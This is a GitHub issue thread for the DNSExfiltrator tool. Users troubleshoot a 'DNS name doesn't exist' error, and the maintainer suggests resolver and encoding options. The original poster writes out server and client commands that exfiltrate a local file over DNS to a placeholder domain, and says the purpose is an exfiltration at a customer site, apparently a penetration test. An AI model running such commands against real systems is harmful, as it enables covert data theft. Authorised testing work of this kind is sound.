-
Notifications
You must be signed in to change notification settings - Fork 181
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
i am getting a message saying that my DNS name doens't exist #5
Comments
+1, its the same for me "DNS name doesn't exist", any idea on the solution or this is a bug? |
Hi, You don't necessarily have to set the "s=ip of your ec2 machine" since the client machine might not be able to reach your server directly. Try to just remove this parameter so that the client uses its system wide resolver. If it still doesn't work, you could also try to use the "-b32" option which might help with some resolvers which don't allow all base64 characters. So you have two things to give a try :-) |
-b32 is for DoH options, however its not the case that we have. I've tried all the options you asked but with no luck. can we have a quick session together to look at this quickly, please? |
Hi, may I know if there is any solution for this bcs im facing the same issue |
i am using the power shell ,
i have an EC2 virtual machine on amazone which is running Kali Linux and i am doing the same steps having the same domain specified in the server and the client
Server : .\dnsexfiltrator.py -d mydomain.com -p password
Client : ./DNSExfiltrator.exe c:\users\root\Desktop\DNSExfiltrator-master\test1.png mydomain.com password s=ip of my ec2 machine t=1000
i also tried to put the domain name of the ec2 machine but it didnt recognize it.
your help will be highly apprecaited as i have an exfiltration at a customer site and i need to use this tool
Best Regards
The text was updated successfully, but these errors were encountered: